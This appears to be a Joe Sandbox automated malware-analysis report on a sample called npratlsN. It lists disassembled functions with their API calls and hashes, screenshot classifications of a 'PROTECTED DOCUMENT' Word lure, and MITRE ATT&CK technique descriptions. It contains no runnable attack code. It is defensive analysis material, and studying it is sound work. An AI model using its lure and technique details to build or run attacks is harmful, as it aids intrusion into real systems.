Instruction Fuzzy Hash: ADC1BD74E00218CFDB54DFA5C984B9DBBB2FF89304F2081A9D809AB365DB759A85CF50

Function 2F68D840 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

8`[., xrefs: 2F68D8FE

Memory Dump Source

Source File: 0000000A.00000002.3474779962.000000002F680000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f680000_npratlsN.jbxd

Similarity

API ID:
String ID: 8`[.
API String ID: 0-3650440482
Opcode ID: 15af809a0ffb0e0e1884aa17b8214fe293f4f095438cdd91f7ee0e9f0f163029
Instruction ID: 5b6053d8cedd1828a56ef08893ee3134f190dbb012f57dd776f1f3b1173b273c
Opcode Fuzzy Hash: 15af809a0ffb0e0e1884aa17b8214fe293f4f095438cdd91f7ee0e9f0f163029
Instruction Fuzzy Hash: B4C19E74E00218CFDB14DFA5C994B9DBBB2FF89304F2081A9D809AB365DB759A85CF50

Function 2F68E0F0 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

8`[., xrefs: 2F68E1AE

Memory Dump Source

Source File: 0000000A.00000002.3474779962.000000002F680000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f680000_npratlsN.jbxd

Similarity

API ID:
String ID: 8`[.
API String ID: 0-3650440482
Opcode ID: 3dac95bdbb4bb95df751645444c409ab9d7e185065fb07efe4359067205b4940
Instruction ID: fdd47c0cb246487dcdf45dceb4f541c80e420c37e8184e0676fceee6186039fa
Opcode Fuzzy Hash: 3dac95bdbb4bb95df751645444c409ab9d7e185065fb07efe4359067205b4940
Instruction Fuzzy Hash: A0C19D74E00218CFDB14DFA5C994B9DBBB2EF89304F2081A9D809AB365DB759E85CF50

Function 2F68DC98 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

8`[., xrefs: 2F68DD56

Memory Dump Source

Source File: 0000000A.00000002.3474779962.000000002F680000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f680000_npratlsN.jbxd

Similarity

API ID:
String ID: 8`[.
API String ID: 0-3650440482
Opcode ID: 4f326eeabce3918194a9830eaea136cc7cedafd36653242f155d3d9ff29bd3f5
Instruction ID: 8d0b272d47b49d73351be016c6e88bce3ef5ed62af85723828db2c2013dc83e1
Opcode Fuzzy Hash: 4f326eeabce3918194a9830eaea136cc7cedafd36653242f155d3d9ff29bd3f5
Instruction Fuzzy Hash: B1C1AD74E00218CFDB54DFA5C984B9DBBB2EF89304F2081A9D809AB365DB759E85CF50

Function 2F700960 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

8`[., xrefs: 2F700A1E

Memory Dump Source

Source File: 0000000A.00000002.3474981544.000000002F700000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f700000_npratlsN.jbxd

Similarity

API ID:
String ID: 8`[.
API String ID: 0-3650440482
Opcode ID: bd6c3a56ec7fccb9da7c9062075d0c53f356ee19eeb5d87645b726f3151bf97c
Instruction ID: 25d9d10ccc73b5ceb2c7180adcef03dfe9108d2ef794727cbc6d577e46ce6b97
Opcode Fuzzy Hash: bd6c3a56ec7fccb9da7c9062075d0c53f356ee19eeb5d87645b726f3151bf97c
Instruction Fuzzy Hash: 7BC1AF74E00218CFDB14DFA5C984B9DBBB2AF89304F2081A9D809AB365DB759E85CF50

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 2FE27A91 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3475770930.000000002FE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 2FE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2fe20000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00918b42dce4137bee73a6ba773ab3bc38c0a99bfa3fe2fcf27f5e81572c6934
Instruction ID: c3feb877f5608ea874b275ea61f34891712b995802ab36689b1277f716756dae
Opcode Fuzzy Hash: 00918b42dce4137bee73a6ba773ab3bc38c0a99bfa3fe2fcf27f5e81572c6934
Instruction Fuzzy Hash: ED41ABB5D052489FCB01DFA9E981ADDFBF1AF49314F14906AE908BB220D334AA45CF55

Function 2FE24C9C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3475770930.000000002FE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 2FE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2fe20000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8fe80303e4c5ae35c386e324d4c6effba4ef95ffc0eaa58ef70caa33844fd11
Instruction ID: 936b7f111be5a2eb3c294d25526deca38602c697169866367864a7070052d993
Opcode Fuzzy Hash: f8fe80303e4c5ae35c386e324d4c6effba4ef95ffc0eaa58ef70caa33844fd11
Instruction Fuzzy Hash: 52319BB5D0521C9FCB10CFA9D985ADEFBF1AB49310F10902AE518B7310D374A945CF54

Function 2FE27AC0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3475770930.000000002FE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 2FE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2fe20000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c11cc99181e867fd49332145187e5718901dd7325792dad9f9cef036ada5a3
Instruction ID: 71ba708dcf9540e1ee487c087469694144c96d68ce8c5d98778cc34d695f80f6
Opcode Fuzzy Hash: d7c11cc99181e867fd49332145187e5718901dd7325792dad9f9cef036ada5a3
Instruction Fuzzy Hash: 233199B4D012589FCB10DFA9E984ADEFBF1AB49314F24902AE518BB310D334A946CF58

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,29A718D8), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.NPRATLSN(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.NPRATLSN(80070057), ref: 00401800
EntryPoint.NPRATLSN(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.NPRATLSN(8007000E), ref: 00401839
EntryPoint.NPRATLSN(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(29A71678), ref: 00414050

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Input	Output
URL: Office document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Office document Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
